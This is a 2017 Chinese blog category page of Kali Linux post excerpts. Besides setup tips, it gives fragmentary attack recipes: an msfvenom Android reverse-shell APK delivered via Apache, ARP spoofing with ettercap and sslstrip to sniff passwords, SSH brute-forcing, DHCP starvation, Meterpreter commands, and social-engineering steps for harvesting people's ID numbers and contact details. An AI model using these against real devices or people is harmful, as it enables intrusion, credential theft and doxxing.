kalilinux - 随笔分类 - itholiday

[转]谈谈 Mifare Classic 破解

摘要：Mifare Classic 提供 1 Kb 4Kb 的容量，现在国内采用的多数是 Mifare Classic 1k(S50)[后面简称 M1 卡] M1 卡有从 0 到 15 共 16 个扇区，每个扇区配备了从 0 到 3 共 4 个段，每个段可以保存 16 字节的内容每个扇区的第 4 个段（阅读全文

posted @ 2017-02-23 19:27 itholiday 阅读(1541) 评论(0) 推荐(0)

mac伪装工具macchanger

摘要：macchanger 阅读全文

posted @ 2017-02-22 22:39 itholiday 阅读(1189) 评论(0) 推荐(0)

mitmproxy

摘要：http://www.freebuf.com/sectool/76361.html 阅读全文

posted @ 2017-02-22 22:30 itholiday 阅读(161) 评论(0) 推荐(0)

yersinia的DHCP池耗尽断网攻击

摘要：http://jingyan.baidu.com/article/0eb457e5045bd703f1a9051d.html yersinia G 阅读全文

posted @ 2017-02-22 22:04 itholiday 阅读(579) 评论(0) 推荐(0)

kalilinux工具中文在线

摘要：https://www.hackfun.org/kali tools/kali tools zh.html 阅读全文

posted @ 2017-02-22 20:29 itholiday 阅读(579) 评论(0) 推荐(0)

渗透测试的一些总结

摘要：使用命令: 破解ssh登录名和密码 msconsole回车 search ssh 查找ssh相关的模块 use auxiliary/scanner/ssh/ssh_login 调用ssh破解程序 show options 查看选项 set rhosts 127.0.0.1 设置要破解的IP地址（必须阅读全文

posted @ 2017-02-21 18:21 itholiday 阅读(179) 评论(0) 推荐(0)

kallinux2.0安装网易云音乐

摘要：安装 dpkg i netease cloud music_1.0.0_amd64.kali2.0(yagami).deb apt get f install dpkg i netease cloud music_1.0.0_amd64.kali2.0(yagami).deb root 运行网易云阅读全文

posted @ 2017-02-19 14:19 itholiday 阅读(203) 评论(0) 推荐(0)

[可用]android hack

摘要：1. msfvenom p android/meterpreter/reverse_tcp LHOST=192.168.1.237 LPORT=4444 R shell.apk 2. service apache2 start 3. mv shell.apk /var/www/html 4. msf 阅读全文

posted @ 2017-02-19 10:35 itholiday 阅读(226) 评论(0) 推荐(0)

社会工程学

摘要：本地社工库：数据库极搜，txt文本分割器 whois 前程无忧智联招聘铁路订票获取身份证 http://www.idtag.cn/reg_id/index.html 身份信息核对姓名 QQ号电话号码邮箱常用ID 生日你喜欢的人你喜欢的一个名字你最熟悉的东西支付宝 zhangzhu 阅读全文

posted @ 2017-02-18 14:47 itholiday 阅读(329) 评论(0) 推荐(0)

arpspoof+ettercap嗅探局域网HTTP/HTTPS账号密码

摘要：1. 开转发 2. arpspoof i eth0 t 192.168.110 192.168.1.1 3. ettercap Tq i eth0 1. /etc/ettercap/etter.conf /Linux 去掉 2. sslstrip a s k 淘宝加密的太好啦，看不出密码。。。 1. 阅读全文

posted @ 2017-02-16 18:07 itholiday 阅读(2111) 评论(0) 推荐(0)

linux上chrome、vlc等程序root不能运行的解决办法

摘要：which vlc 或者 whereis vlc 输入/geteuid，输入i进入输入模式，将geteuid改成getppid，然后ESC，输入wq，保存退出，这样程序root用户就可以运行了。 chrome、vlc等程序使root用户无法使用的原理是：它获取程序的所有者，如果它是root用户，就让阅读全文

posted @ 2017-02-16 10:52 itholiday 阅读(2695) 评论(0) 推荐(0)

kalilinux、parrotsecos没有声音

摘要：Kali Linux系统默认状态下，root用户是无法使用声卡的，也就没有声音。启用的方法如下：（1）在终端执行命令：systemctl user enable pulseaudio （2）在/etc/default/目录下，创建一个文件，命名为pulseaudio，并添加以下内容： PULSEA 阅读全文

posted @ 2017-02-16 10:29 itholiday 阅读(450) 评论(0) 推荐(0)

live kalilinux能保存文件和设置

摘要：1. win32diskimager写入kalilinux镜像，建议用parrot sec os 2. gparted /dev/sdb,新建分区sdb3,Lable输入persistence 4. 挂载/dev/sdb3，echo "/ union" /root/usbsdb3/persisten 阅读全文

posted @ 2017-02-15 19:29 itholiday 阅读(861) 评论(0) 推荐(0)

渗透测试文章链接

摘要：Kali Linux渗透基础知识整理（二）：漏洞扫描：http://www.freebuf.com/sectool/109952.html DVWA(dema vulnerable web application)是一个基于PHP/MYSQL环境写的一个web应用。他的主要目的是帮助安全专业员去测阅读全文

posted @ 2017-02-15 17:09 itholiday 阅读(148) 评论(0) 推荐(0)

渗透工具记录

摘要：burpsuite nessus w3af sqlmap openvas shellcode 阅读全文

posted @ 2017-02-14 21:39 itholiday 阅读(123) 评论(0) 推荐(0)

Kali linux切换语言为中文

摘要：echo LANG="zh_CN.UTF 8" /etc/default/locale 阅读全文

posted @ 2017-02-14 15:04 itholiday 阅读(1310) 评论(0) 推荐(0)

【笔记】metasploit渗透测试魔鬼训练营-信息搜集

摘要：exploit 漏洞利用代码编码器模块：免杀、控制 help [cmd] msfcli适合对网络中大量系统统一测试。打开数据包路由转发功能：/etc/sysctl.conf /etc/rc.local iptables t nat A POSTROUTING s 192.168.10.0/24 阅读全文

posted @ 2017-02-14 09:21 itholiday 阅读(255) 评论(0) 推荐(0)

meterpreter命令

摘要：" meterpreter详解与渗透实战 " 基本命令： background quit shell irb client.sys.config.sysinfo() 调用windows API：client.core.use("railgun") 弹出会话窗口：client.railgun.user 阅读全文

posted @ 2017-02-13 19:29 itholiday 阅读(874) 评论(0) 推荐(0)

kalilinux基础

摘要：service postgresql start service metasploit start msfconsole db_status 配置metasploit随系统启动： update rc.d postgresql enable update rc.d metasploit enable 阅读全文

posted @ 2017-02-13 10:26 itholiday 阅读(151) 评论(0) 推荐(0)

记录渗透想法

摘要：改hosts： /windows/system32/driver/etc/hosts 路由器后台admin admin 阅读全文

posted @ 2017-02-12 21:44 itholiday 阅读(117) 评论(0) 推荐(0)

随笔分类 - kalilinux

公告